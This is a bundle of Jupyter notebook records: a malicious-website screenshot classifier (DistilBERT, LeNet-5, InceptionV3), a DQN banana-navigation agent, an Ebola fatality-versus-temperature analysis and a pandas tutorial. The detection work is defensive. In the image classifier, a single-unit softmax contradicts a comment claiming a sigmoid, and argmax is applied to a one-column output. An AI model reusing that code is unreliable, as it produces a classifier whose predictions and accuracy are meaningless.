"Some weights of the model checkpoint at distilbert-base-cased were not used when initializing DistilBertForSequenceClassification: ['vocab_layer_norm.weight', 'vocab_transform.bias', 'vocab_projector.bias', 'vocab_projector.weight', 'vocab_layer_norm.bias', 'vocab_transform.weight']\n- This IS expected if you are initializing DistilBertForSequenceClassification from the checkpoint of a model trained on another task or with another architecture (e.g. initializing a BertForSequenceClassification model from a BertForPreTraining model).\n- This IS NOT expected if you are initializing DistilBertForSequenceClassification from the checkpoint of a model that you expect to be exactly identical (initializing a BertForSequenceClassification model from a BertForSequenceClassification model).\nSome weights of DistilBertForSequenceClassification were not initialized from the model checkpoint at distilbert-base-cased and are newly initialized: ['classifier.weight', 'pre_classifier.weight', 'pre_classifier.bias', 'classifier.bias']\nYou should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.\n/Users/ahmadchaiban/opt/anaconda3/lib/python3.7/site-packages/simpletransformers/classification/classification_model.py:1376: UserWarning:\n\nDataframe headers not specified. Falling back to using column 0 as text and column 1 as labels.\n\n"
]
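,
[
"# Sketch (not executed): the classification head above is randomly initialised,\n# so for a meaningful evaluation the model would first be fine-tuned on the URLs:\n# model.train_model(train_trans_df)\n# result, model_outputs, wrong_predictions = model.eval_model(test_trans_df)",
"_____no_output_____"
]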
],
[
[
"## Image Classification Approach",
"_____no_output_____"
],
[
"### Reading images",
"_____no_output_____"
]
],
[
[
"import cv2\nfrom glob import glob as globlin\n\nimage_paths = globlin('./img_extraction/dataset_20_images/*.png')\n\nbenign_images = []\nmalicious_images = []\npbar = tqdm(total=len(image_paths))\n\nfor path in image_paths:\n image = cv2.resize(cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB), (512, 512))\n if 'bad' in path:\n malicious_images.append(image)\n else:\n benign_images.append(image)\n pbar.update(1)\npbar.close()\n\nprint(f'Starting Number of Malicious Images = {len(malicious_images)}')\nprint(f'Starting Number of Benign Images = {len(benign_images)}')",
"100%|██████████| 14097/14097 [02:14<00:00, 105.00it/s]"
]
],
[
[
"### Removing images with a could not connect page, or white page",
"_____no_output_____"
]
],
[
[
"from skimage.metrics import structural_similarity as ssim\n \ndef cleave_error_images(reference_image, cutoff_score, image_list):\n cleave_index = []\n for i in tqdm(range(0, len(image_list))):\n try:\n ssim_noise = ssim(reference_image, image_list[i], multichannel=True)\n if ssim_noise >= cutoff_score:\n cleave_index.append(i)\n except:\n cleave_index.append(i)\n return cleave_index\n\n\nreference_image = malicious_images[4]\nmalicious_images_idx = cleave_error_images(reference_image, 0.9, malicious_images)\nbenign_image_idx = cleave_error_images(reference_image, 0.9, benign_images)\n\nprint(f'Number of Malicious Images after deletion = {len(malicious_images) - len(malicious_images_idx)}')\nprint(f'Number of Benign Images after deletion = {len(benign_images) - len(benign_image_idx)}')",
"100%|██████████| 6101/6101 [05:11<00:00, 19.59it/s]\n100%|██████████| 7996/7996 [06:43<00:00, 19.84it/s]"
],
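[
"# SSIM of an image with itself is 1.0, which is why near-duplicates of the\n# reference error page score above the 0.9 cutoff used above.\nprint(ssim(reference_image, reference_image, multichannel=True))",
"_____no_output_____"
],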
[
"new_malicious_images = np.delete(np.array(malicious_images), malicious_images_idx, axis=0)\nnew_benign_images = np.delete(np.array(benign_images), benign_image_idx, axis=0)",
"_____no_output_____"
],
[
"np.savez('./img_extraction/malicious_images.npz', new_malicious_images)\nnp.savez('./img_extraction/benign_images.npz', new_benign_images)",
"_____no_output_____"
]
],
[
[
"### Image checkpoint",
"_____no_output_____"
]
],
[
[
"malicious_img = np.load('./img_extraction/malicious_images.npz', allow_pickle=True)['arr_0']\nbenign_img = np.load('./img_extraction/benign_images.npz', allow_pickle=True)['arr_0']",
"_____no_output_____"
],
[
"plt.imshow(benign_img[3])",
"_____no_output_____"
],
[
"malicious_img",
"_____no_output_____"
],
[
"plt.imshow(malicious_img[2])",
"_____no_output_____"
]
],
[
[
" ### Machine Learning ",
"_____no_output_____"
]
],
[
[
"from tensorflow.python.client import device_lib\n\ndevice_lib.list_local_devices()",
"_____no_output_____"
],
[
"import os\n\nos.environ['CUDA_VISIBLE_DEVICES'] = \"0\"",
"_____no_output_____"
]
],
[
[
"#### Train-test-split",
"_____no_output_____"
]
],
[
[
"import tensorflow as tf",
"_____no_output_____"
],
[
"y_malicious = np.full(len(malicious_img), 1)\ny_benign = np.full(len(benign_img), 0) \n\nlabels_df = np.array(np.concatenate([y_malicious, y_benign]).astype(np.float32))",
"_____no_output_____"
],
[
"image_df = np.array(np.concatenate([malicious_img, benign_img]))\n\n# image_df = [image_df[i].astype(np.int) for i in tqdm(range(len(image_df)))]",
"_____no_output_____"
],
[
"X_train_img, X_test_img, y_train_img, y_test_img = train_test_split(image_df, labels_df, test_size=0.33, random_state=42)",
"_____no_output_____"
]
],
[
[
"#### Lenet-5",
"_____no_output_____"
]
],
[
[
"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, Dense, AveragePooling2D, Flatten, Dropout\n\nmodel = Sequential([\n Conv2D(filters=6,\n kernel_size=(3, 3),\n activation='relu',\n input_shape=X_train_img[0].shape),\n Conv2D(filters=16, kernel_size=(3, 3), activation='relu'),\n AveragePooling2D(),\n Flatten(),\n Dense(units=120, activation='relu'),\n Dense(units=84, activation='relu'),\n Dense(units=1, activation='softmax')\n])",
"_____no_output_____"
],
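[
"# With a sigmoid output the network emits P(malicious) in [0, 1]; a softmax over\n# a single unit would always output 1.0, hence the sigmoid above.\nmodel.summary()",
"_____no_output_____"
],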
[
"model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel_history = model.fit(X_train_img, y_train_img, #validation_data=(X_valid_NN, y_valid_NN), \n epochs=15, batch_size=256, verbose=True)",
"Epoch 1/15\n37/37 [==============================] - 638s 17s/step - loss: 11943.7792 - accuracy: 0.4305\nEpoch 2/15\n 4/37 [==>...........................] - ETA: 9:47 - loss: 213.0984 - accuracy: 0.4080 "
],
[
"y_pred = (model.predict(X_test_img) > 0.5).astype(\"int32\")\n\naccuracy_score(y_test_img, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test_img, y_pred)",
"_____no_output_____"
]
],
[
[
"#### Pretrained inception V3",
"_____no_output_____"
]
],
[
[
"inception_model = tf.keras.applications.InceptionV3(\n include_top=False, weights='imagenet', input_tensor=None, input_shape=X_train_img[0].shape,\n pooling=None, classes=1000, classifier_activation=None\n)\n\nfor layer in inception_model.layers:\n layer.trainable = False\nx = Flatten()(inception_model.output)\nx = Dense(1024, activation='relu')(x)\nx = Dropout(0.7)(x)\nx = Dense(75, activation='relu')(x)\nx = Dropout(0.2)(x)\nx = Dense(1, activation='sigmoid')(x)\n\ninception_model = tf.keras.Model(inception_model.input, x)\n#inception_model.summary()",
"_____no_output_____"
],
[
"epochs = 5\nbatch_size = 5\noptimizer = tf.keras.optimizers.Adam(learning_rate=0.01, name='adam')\nloss_function = tf.keras.losses.binary_crossentropy\n\ninception_model.compile(optimizer=optimizer, loss=loss_function, metrics=['accuracy'])\n\nhistory = inception_model.fit(x=X_train_img,\n y=y_train_img,\n batch_size=batch_size,\n epochs=epochs,\n validation_split=0.2)",
"_____no_output_____"
],
[
"y_pred_proba = inception_model.predict(X_test_img)\ny_pred = np.argmax(y_pred_proba, axis=-1)\naccuracy_score(y_test_img, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test_img, y_pred)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
e7089de1707dc9fec29389521d0593da894bf7d7 | 83,240 | ipynb | Jupyter Notebook | gnunify2015/gnunify06_Miscellaneous.ipynb | satish-annigeri/Notebooks | 92a7dc1d4cf4aebf73bba159d735a2e912fc88bb | [
"CC0-1.0"
] | null | null | null | gnunify2015/gnunify06_Miscellaneous.ipynb | satish-annigeri/Notebooks | 92a7dc1d4cf4aebf73bba159d735a2e912fc88bb | [
"CC0-1.0"
] | null | null | null | gnunify2015/gnunify06_Miscellaneous.ipynb | satish-annigeri/Notebooks | 92a7dc1d4cf4aebf73bba159d735a2e912fc88bb | [
"CC0-1.0"
] | null | null | null | 203.02439 | 69,359 | 0.895531 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
e708a709773760162dca56d019c73d0e486babde | 47,488 | ipynb | Jupyter Notebook | script_1.ipynb | BruceChanJianLe/drlnd-banana-navigation-project1 | c30c393f945a84860f7b503b5fe33972bf2f6ad7 | [
"MIT"
] | null | null | null | script_1.ipynb | BruceChanJianLe/drlnd-banana-navigation-project1 | c30c393f945a84860f7b503b5fe33972bf2f6ad7 | [
"MIT"
] | null | null | null | script_1.ipynb | BruceChanJianLe/drlnd-banana-navigation-project1 | c30c393f945a84860f7b503b5fe33972bf2f6ad7 | [
"MIT"
] | null | null | null | 105.2949 | 25,512 | 0.809762 | [
[
[
"# Banana Navigation\n\n## Import Packages",
"_____no_output_____"
]
],
[
[
"# If you are runnning on Udacity's VM please run their script\nvm_var = True\n!pip -q install ./python",
"\u001b[31mtensorflow 1.7.1 has requirement numpy>=1.13.3, but you'll have numpy 1.12.1 which is incompatible.\u001b[0m\r\n\u001b[31mipython 6.5.0 has requirement prompt-toolkit<2.0.0,>=1.0.15, but you'll have prompt-toolkit 3.0.7 which is incompatible.\u001b[0m\r\n"
],
[
"from unityagents import UnityEnvironment\nimport numpy as np\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom collections import deque, namedtuple\nimport matplotlib.pyplot as plt\n%matplotlib inline",
"_____no_output_____"
]
],
[
[
"## Initialize Unity Environment",
"_____no_output_____"
]
],
[
[
"if vm_var:\n env = UnityEnvironment(file_name=\"/data/Banana_Linux_NoVis/Banana.x86_64\")\n# else:\n# env = UnityEnvironment(filename=\"data/Banana_Linux_NoVis/Banana.x86_64\")\n\n# Obtain the default brain\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\n# Reset the environment\nenv_info = env.reset(train_mode=True)[brain_name]\n# Display number of agents in the environment\nprint('Number of agents:', len(env_info.agents))\n\n# Obtain and display action size \naction_size = brain.vector_action_space_size\nprint('Number of actions:', action_size)\n\n# Obtain and display state space\nstate = env_info.vector_observations[0]\nprint('The states look like:', state)\n\n# Obtain and display state size\nstate_size = len(state)\nprint('The states size:', state_size)",
"INFO:unityagents:\n'Academy' started successfully!\nUnity Academy name: Academy\n Number of Brains: 1\n Number of External Brains : 1\n Lesson number : 0\n Reset Parameters :\n\t\t\nUnity brain name: BananaBrain\n Number of Visual Observations (per agent): 0\n Vector Observation space type: continuous\n Vector Observation space size (per agent): 37\n Number of stacked Vector Observation: 1\n Vector Action space type: discrete\n Vector Action space size (per agent): 4\n Vector Action descriptions: , , , \n"
]
],
[
[
"## Define Deep Learning Model\n\n2 fully connected hidden layers with 64 neurons and ReLu as activation function",
"_____no_output_____"
]
],
[
[
"def Qmodel(state_size, action_size, seed):\n model = nn.Sequential(nn.Linear(state_size, 64),\n nn.ReLU(),\n nn.Linear(64, 64),\n nn.ReLU(),\n nn.Linear(64,action_size))\n return model",
"_____no_output_____"
]
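,
[
"# Quick look at the network (assumes the environment cell above has run so that\n# state_size and action_size are defined).\nprint(Qmodel(state_size, action_size, seed=0))",
"_____no_output_____"
]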
],
[
[
"## Define Replay Buffer\n\nReplay buffer with random sampling",
"_____no_output_____"
]
],
[
[
"class ReplayBuffer:\n \"\"\"Fixed-size buffer to store experience tuples.\"\"\"\n\n def __init__(self, action_size, buffer_size, batch_size, seed):\n \"\"\"Initialize a ReplayBuffer object.\n\n Params\n ======\n action_size (int): dimension of each action\n buffer_size (int): maximum size of buffer\n batch_size (int): size of each training batch\n seed (int): random seed\n \"\"\"\n self.action_size = action_size\n self.memory = deque(maxlen=buffer_size) \n self.batch_size = batch_size\n self.experience = namedtuple(\"Experience\", field_names=[\"state\", \"action\", \"reward\", \"next_state\", \"done\"])\n self.seed = random.seed(seed)\n \n def add(self, state, action, reward, next_state, done):\n \"\"\"Add a new experience to memory.\"\"\"\n e = self.experience(state, action, reward, next_state, done)\n self.memory.append(e)\n \n def sample(self):\n \"\"\"Randomly sample a batch of experiences from memory.\"\"\"\n experiences = random.sample(self.memory, k=self.batch_size)\n\n states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(device)\n actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).long().to(device)\n rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(device)\n next_states = torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(device)\n dones = torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8)).float().to(device)\n \n return (states, actions, rewards, next_states, dones)\n\n def __len__(self):\n \"\"\"Return the current size of internal memory.\"\"\"\n return len(self.memory)",
"_____no_output_____"
]
],
[
[
"## Define Agent",
"_____no_output_____"
]
],
[
[
"BUFFER_SIZE = int(1e5) # replay buffer size\nBATCH_SIZE = 64 # minibatch size\nGAMMA = 0.99 # discount factor\nTAU = 5e-3 # for soft update of target parameters\nLR = 1e-3 # learning rate \nUPDATE_EVERY = 4 # how often to update the network\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n\nclass Agent():\n def __init__(self,state_size, action_size, seed):\n self.state_size = state_size\n self.action_size = action_size\n self.seed = random.seed(seed)\n self.q_local = Qmodel(state_size,action_size, seed).to(device)\n self.q_target = Qmodel(state_size,action_size, seed).to(device)\n self.optimizer = optim.Adam(self.q_local.parameters(), lr=LR)\n \n self.buffer = ReplayBuffer(action_size, BUFFER_SIZE, BATCH_SIZE, seed)\n self.t_step = 0\n return\n \n def step(self, state, action, reward, next_state, done):\n self.buffer.add(state, action, reward, next_state, done)\n \n self.t_step = (self.t_step +1) % UPDATE_EVERY \n if self.t_step == 0:\n if len(self.buffer)>BATCH_SIZE:\n self.learn()\n return\n \n def act(self,state, eps = 0.0):\n state = torch.from_numpy(state).float().unsqueeze(0).to(device)\n self.q_local.eval()\n with torch.no_grad():\n action = self.q_local(state)\n self.q_local.train()\n if random.random() > eps:\n action = np.argmax(action.cpu().data.numpy())\n else:\n action = np.random.choice(np.arange(self.action_size))\n return action\n \n def learn(self):\n states, actions, rewards, next_states, dones = self.buffer.sample()\n q_targets_next = self.q_target(next_states).detach().max(1)[0].unsqueeze(1)\n q_targets = rewards + (GAMMA * q_targets_next * (1 - dones))\n q_pred = self.q_local(states).gather(1,actions)\n loss = F.mse_loss(q_pred,q_targets)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.soft_update()\n return\n \n def soft_update(self):\n for target_p, local_p in zip(self.q_target.parameters(), self.q_local.parameters()):\n target_p.data.copy_(TAU * local_p.data + (1 - TAU)*target_p.data)\n return",
"_____no_output_____"
]
],
[
[
"## Define Training Function",
"_____no_output_____"
]
],
[
[
"def dqn(n_episodes=3000, max_t=1000, eps_start=1.0, eps_end=0.01, eps_decay=0.995):\n scores = []\n scores_recent = []\n eps = eps_start\n for i_episode in range(1, n_episodes+1):\n env_info = env.reset(train_mode=True)[brain_name]\n state = env_info.vector_observations[0] # get the initial state\n score = 0\n for i_t in range(max_t): # considered as episodic with 100 steps\n action = agent.act(state, eps) # select an action\n env_info = env.step(action)[brain_name] # send the action to the environment\n next_state = env_info.vector_observations[0] # get the next state\n reward = env_info.rewards[0] # get the reward\n done = env_info.local_done[0] # see if episode has finished\n agent.step(state, action, reward, next_state, done) # Sample & Learn step of Q learning\n score += reward # update the score\n state = next_state # roll over the state to next time step\n if done: # exit loop if episode finished\n break\n scores.append(score)\n scores_recent.append(score)\n eps = max(eps_end, eps*eps_decay) # decrease epsilon\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_recent)), end=\"\")\n if i_episode % 100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_recent)))\n if np.mean(scores_recent)>=13.0:\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_recent)))\n torch.save(agent.q_local.state_dict(), 'my_weights.pth')\n break\n return scores",
"_____no_output_____"
]
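,
[
"# Epsilon schedule sanity check: with eps_decay=0.93 (used below), exploration\n# decays from 1.0 to the eps_end floor of 0.01 in roughly 65 episodes.\neps = 1.0\nfor ep in [1, 10, 50, 100]:\n    print(ep, round(max(0.01, 0.93 ** ep), 4))",
"_____no_output_____"
]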
],
[
[
"## Run The Code!!!",
"_____no_output_____"
]
],
[
[
"# Provide parameters to agent\nagent = Agent(state_size, action_size, seed=0)\n# Obtain scores\nscore = dqn(2000, eps_decay=0.930)",
"Episode 100\tAverage Score: 6.63\nEpisode 200\tAverage Score: 8.17\nEpisode 300\tAverage Score: 9.42\nEpisode 400\tAverage Score: 10.28\nEpisode 500\tAverage Score: 11.03\nEpisode 600\tAverage Score: 11.51\nEpisode 700\tAverage Score: 11.92\nEpisode 800\tAverage Score: 12.20\nEpisode 900\tAverage Score: 12.42\nEpisode 1000\tAverage Score: 12.53\nEpisode 1100\tAverage Score: 12.55\nEpisode 1200\tAverage Score: 12.71\nEpisode 1300\tAverage Score: 12.83\nEpisode 1400\tAverage Score: 12.91\nEpisode 1500\tAverage Score: 12.98\nEpisode 1533\tAverage Score: 13.00\nEnvironment solved in 1433 episodes!\tAverage Score: 13.00\n"
],
[
"fig = plt.figure()\nax = fig.add_subplot(111)\nplt.plot(np.arange(len(score)), score)\nplt.ylabel('Score')\nplt.xlabel('Episode #')\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e708c4a90841df77cc2af963a64ac28ffb8e6293 | 54,505 | ipynb | Jupyter Notebook | models/.ipynb_checkpoints/CFR & Temp-checkpoint.ipynb | afcarl/ebola-imc-public | 94f8621ed6930447dd81898f1a1ff44862c17108 | [
"MIT"
] | null | null | null | models/.ipynb_checkpoints/CFR & Temp-checkpoint.ipynb | afcarl/ebola-imc-public | 94f8621ed6930447dd81898f1a1ff44862c17108 | [
"MIT"
] | null | null | null | models/.ipynb_checkpoints/CFR & Temp-checkpoint.ipynb | afcarl/ebola-imc-public | 94f8621ed6930447dd81898f1a1ff44862c17108 | [
"MIT"
] | 2 | 2020-05-07T14:38:49.000Z | 2020-05-07T19:00:19.000Z | 251.175115 | 12,806 | 0.91076 | [
[
[
"This notebook plots the graph of temperature as function of age",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats",
"/Users/andres/anaconda/lib/python2.7/site-packages/matplotlib/__init__.py:872: UserWarning: axes.color_cycle is deprecated and replaced with axes.prop_cycle; please use the latter.\n warnings.warn(self.msg_depr % (key, alt_key))\n"
],
[
"# This generates the \"eikosogram\" of mortality as function of fever temperature, each bar in the plot\n# represents the conditional probability of death given that temperature is in that bin\n\nsrc_data_file = '../data/data.csv'\ndata = pd.read_csv(src_data_file, na_values='\\\\N')\n\nnum_bins = 5\nvar = 'FeverTemperature'\n\nmint = data[var].min()\nmaxt = data[var].max()\n\nbins = np.linspace(mint, maxt, num=num_bins)\nbins_names = []\nfor i in range(0, len(bins) - 1):\n bins_names += [str(round(bins[i],1)) + \"-\" + str(round(bins[i + 1],1))]\n\ndata1 = data.copy()\n\ndata1['bin'] = pd.cut(data1[var], bins, labels=False)\ndata1 = data1.dropna(subset=['bin'])\ndied_temp = data1[data1['Disposition'] == 1].groupby(['bin']).count()['Disposition']\ntotals_temp = data1.groupby(['bin']).count()['Disposition']\n\nfig, ax = plt.subplots()\n\nbar_width = 0.35\nopacity = 0.8\ncfr_pdw = 100 * died_temp / totals_temp\nindex = np.arange(len(bins) - 1)\nrects2 = plt.bar(index, cfr_pdw, bar_width,\n alpha=opacity,\n color=sns.xkcd_rgb[\"pale red\"],\n label='CFR')\n\nplt.xlabel('Fever Temperature', labelpad=20)\nplt.ylabel('CFR %')\nplt.title('CFR as function of Fever Temperature')\nplt.xticks(index + bar_width/2, bins_names, rotation=0)\n\nfig.savefig('cfr_temp.pdf')",
"_____no_output_____"
],
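[
"# pd.cut with labels=False returns the 0-based bin index for each value (NaN for\n# values outside the edges). Tiny sketch with three temperature bins:\nprint(pd.cut(pd.Series([36.5, 38.2, 41.0]), np.linspace(36, 42, num=4), labels=False).tolist())  # [0, 1, 2]",
"_____no_output_____"
],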
[
"# Looking at differences in fever temperature between males and females, \n# depending on\n# 0 = Female\n# 1 = Male\n\ndata = pd.read_csv(src_data_file, na_values=\"\\\\N\")\ndata_male_died = data[(data[\"PatientSex\"] == 1) & (data[\"Disposition\"] == 1)]\ndata_male_surv = data[(data[\"PatientSex\"] == 1) & (data[\"Disposition\"] == 0)]\ndata_male_died.hist(column=\"FeverTemperature\")\ndata_male_surv.hist(column=\"FeverTemperature\")\n\ndata_fem_died = data[(data[\"PatientSex\"] == 0) & (data[\"Disposition\"] == 1)]\ndata_fem_surv = data[(data[\"PatientSex\"] == 0) & (data[\"Disposition\"] == 0)]\ndata_fem_died.hist(column=\"FeverTemperature\")\ndata_fem_surv.hist(column=\"FeverTemperature\")\nprint \"Male died: \", data_male_died[\"FeverTemperature\"].mean()\nprint \"Male surv: \",data_male_surv[\"FeverTemperature\"].mean()\n(s, p) = stats.ttest_ind(data_male_died[\"FeverTemperature\"],data_male_surv[\"FeverTemperature\"],nan_policy='omit')\nprint \"P-value of the difference between means for males: \", p\n\nprint \"Female died: \",data_fem_died[\"FeverTemperature\"].mean()\nprint \"Female surv: \",data_fem_surv[\"FeverTemperature\"].mean()\n(s, p) = stats.ttest_ind(data_fem_died[\"FeverTemperature\"],data_fem_surv[\"FeverTemperature\"],nan_policy='omit')\nprint \"P-value of the difference between means for females: \", p",
"Male died: 37.8139534884\nMale surv: 37.328125\nP-value of the difference between means for males: 0.0451559815757\nFemale died: 37.5987341772\nFemale surv: 37.4645833333\nP-value of the difference between means for females: 0.529417282298\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
e708c68422e4d273e3ca2a7b6c6f54fcba7b6d45 | 35,984 | ipynb | Jupyter Notebook | notebooks/intro_to_pandas.ipynb | wkabbani/machine_learning | cc9393365005ca9c1b516309d290987b53a7e75a | [
"Apache-2.0"
] | null | null | null | notebooks/intro_to_pandas.ipynb | wkabbani/machine_learning | cc9393365005ca9c1b516309d290987b53a7e75a | [
"Apache-2.0"
] | null | null | null | notebooks/intro_to_pandas.ipynb | wkabbani/machine_learning | cc9393365005ca9c1b516309d290987b53a7e75a | [
"Apache-2.0"
] | null | null | null | 40.613995 | 8,900 | 0.484076 | [
[
[
"##Basic Concepts",
"_____no_output_____"
]
],
[
[
"from __future__ import print_function\n\nimport pandas as pd\npd.__version__",
"_____no_output_____"
],
[
"# Series is a single column\ntest_series = pd.Series(['one', 'two', 'three'])",
"_____no_output_____"
],
[
"print(test_series)",
"0 one\n1 two\n2 three\ndtype: object\n"
],
[
"# DataFrame contains one or more Series and a name for each Series.\n\nmonths_series = pd.Series(['Jan', 'Feb', 'Mar', 'Apr'])\nsales_series = pd.Series([345, 675, 7655, 65449])\n\ntest_dataframe = pd.DataFrame({'Months': months_series, 'Sales': sales_series })",
"_____no_output_____"
],
[
"test_dataframe.head()",
"_____no_output_____"
],
[
"# loading a file\n\ncalifornia_housing_dataframe = pd.read_csv(\"https://download.mlcc.google.com/mledu-datasets/california_housing_train.csv\", sep=\",\")\ncalifornia_housing_dataframe.describe()",
"_____no_output_____"
],
[
"california_housing_dataframe.head(10)",
"_____no_output_____"
],
[
"california_housing_dataframe.hist('housing_median_age')",
"_____no_output_____"
]
],
[
[
"##Accessing Data",
"_____no_output_____"
]
],
[
[
"print(test_dataframe['Months'][0])",
"Jan\n"
],
[
"print(test_dataframe['Sales'][0:2])",
"0 345\n1 675\nName: Sales, dtype: int64\n"
],
[
"print(test_dataframe[0:2])",
" Months Sales\n0 Jan 345\n1 Feb 675\n"
]
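,
[
"# Boolean masking is another common way to select DataFrame rows:\nprint(test_dataframe[test_dataframe['Sales'] > 500])",
"_____no_output_____"
]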
],
[
[
"##Manipulating Data",
"_____no_output_____"
]
],
[
[
"print(test_dataframe['Sales'])",
"0 345\n1 675\n2 7655\n3 65449\nName: Sales, dtype: int64\n"
],
[
"print(test_dataframe['Sales']/1000)",
"0 0.345\n1 0.675\n2 7.655\n3 65.449\nName: Sales, dtype: float64\n"
],
[
"# pandas series can be used with numpy's functions\n\nimport numpy as np\nnp.log(test_dataframe['Sales'])",
"_____no_output_____"
],
[
"test_series.apply(lambda val: val * 3)",
"_____no_output_____"
],
[
"print(test_dataframe.index)\nprint(test_series.index)",
"RangeIndex(start=0, stop=4, step=1)\nRangeIndex(start=0, stop=3, step=1)\n"
],
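[
"# Series.reindex reorders (or extends) a Series by its index labels:\nprint(test_series.reindex([2, 0, 1]))",
"_____no_output_____"
],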
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e708c7d0fb4963cbe2d6101817450ad4ee97a799 | 12,998 | ipynb | Jupyter Notebook | content/07_collections04.ipynb | geozeke/notebooks | 25a708e86d2d51979bf77c268b2b7ed91d33c954 | [
"MIT"
] | null | null | null | content/07_collections04.ipynb | geozeke/notebooks | 25a708e86d2d51979bf77c268b2b7ed91d33c954 | [
"MIT"
